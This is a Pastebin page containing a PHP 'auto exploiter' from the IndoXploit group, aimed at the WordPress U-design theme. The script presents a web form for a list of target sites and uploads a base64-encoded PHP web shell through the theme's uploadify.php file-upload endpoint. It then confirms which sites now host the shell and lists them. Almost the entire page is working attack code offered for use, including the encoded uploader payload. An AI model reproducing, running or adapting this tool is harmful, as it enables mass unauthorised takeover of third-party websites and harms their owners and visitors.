Advertisement
ustadcage_48

U-design Auto Exploiter

Apr 24th, 2016
280
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 3.64 KB | None | 0 0
  1. <html>
  2. <link href='http://fonts.googleapis.com/css?family=Love+Ya+Like+A+Sister' rel='stylesheet' type='text/css'>
  3. <link href='http://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
  4.  
  5.  
  6.  <style type="text/css">
  7. body { font-family: 'Kaushan Script', sans-serif; text-align:center;}
  8. a {color:darkgreen; font-family: 'Kaushan Script', sans-serif; }
  9. .anu { text-size:40px;font-family: 'Love Ya Like A Sister', sans-serif; }
  10. .lol {font-family: 'Kaushan Script', sans-serif; }
  11. .entryfield {width:600px;height:200px;border:1px solid green; font-family: 'Kaushan Script', sans-serif; }
  12. .en { width:600px; border:1px solid green; font-family: 'Kaushan Script', sans-serif; }
  13. .subbtn {background:green;color:white;border: 1px solid darkgreen; padding:6px 6px 6px 6px; font-family: 'Kaushan Script', sans-serif; }
  14. .subbtn:hover {background:#c0bfbf;color:#000000; font-family: 'Kaushan Script', sans-serif; }
  15. </style>
  16.  
  17. <br>
  18. <br>
  19. <div class="anu"><font size="40">AUTO U-DESIGN INDOXPLOIT</font></div>
  20. <center>
  21. <form method="post" enctype="multipart/form-data">
  22. Shellname: <br><input type="text" class="en" name='filename' style='width: 500px;' height="10" value='indoxploit.php' required><br>
  23. Target: <br><textarea class="entryfield" name="url" placeholder="http://www.target.com/"></textarea><br>
  24. <input type='submit' class="subbtn" name='exp' value='Kill Senpai !'>
  25. </form>
  26. <?php
  27. // IndoXploit
  28. set_time_limit(0);
  29. error_reporting(0);
  30.  
  31. function buffer() {
  32.  ob_flush();
  33.  flush();
  34. }
  35. function curl($url, $payload) {
  36.  $ch = curl_init();
  37.   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  38.   curl_setopt($ch, CURLOPT_URL, $url);
  39.   curl_setopt($ch, CURLOPT_POST, true);
  40.   curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
  41.   curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  42.   curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  43.   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  44.   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  45.   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  46.   curl_setopt($ch, CURLOPT_HEADER, 0);
  47.   curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
  48.   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  49.  $res = curl_exec($ch);
  50.   curl_close($ch);
  51.  return $res;
  52. }
  53. function cek($url) {
  54.  $ch = curl_init();
  55.   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  56.   curl_setopt($ch, CURLOPT_URL, $url);
  57.   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  58.  $res = curl_exec($ch);
  59.   curl_close($ch);
  60.  return $res;
  61. }
  62. $file = htmlspecialchars($_POST['filename']);
  63. $site = explode("\r\n", $_POST['url']);
  64. $do = $_POST['exp'];
  65. $uploader = base64_decode("PD9waHANCmVjaG8gIkluZG9YcGxvaXQgLSBBdXRvIFhwbG9pdGVyIFUtRGVzaWduIjsNCmVjaG8gIjxicj4iLnBocF91bmFtZSgpLiI8YnI+IjsNCmVjaG8gIjxmb3JtIG1ldGhvZD0ncG9zdCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+DQo8aW5wdXQgdHlwZT0nZmlsZScgbmFtZT0naWR4Jz48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSd1cGxvYWQnIHZhbHVlPSd1cGxvYWQnPg0KPC9mb3JtPiI7DQppZigkX1BPU1RbJ3VwbG9hZCddKSB7DQoJaWYoQGNvcHkoJF9GSUxFU1snaWR4J11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2lkeCddWyduYW1lJ10pKSB7DQoJZWNobyAic3Vrc2VzIjsNCgl9IGVsc2Ugew0KCWVjaG8gImdhZ2FsIjsNCgl9DQp9DQo/Pg==");
  66. if($do) {
  67.  $idx_dir = mkdir("indoxploit_tools", 0755);
  68.  $shell = "indoxploit_tools/".$file;
  69.  $fopen = fopen($shell, "w");
  70.  fwrite($fopen, $uploader);
  71.  fclose($fopen);
  72.  foreach($site as $url) {
  73.  $target = $url.'/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php';
  74.  $data = array(
  75.  "Filedata" => "@$shell"
  76.  );
  77.  $curl = curl($target, $data);
  78.  if($curl) {
  79.  $cek = cek($url.'/'.$file);
  80.  if(preg_match("/IndoXploit/i", $cek)) {
  81.  echo "<a href='$url/$file' target='_blank'>$url/$file</a> -> shellmu<br>";
  82.  }
  83.  }
  84.  buffer();
  85.  }
  86. }
  87. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement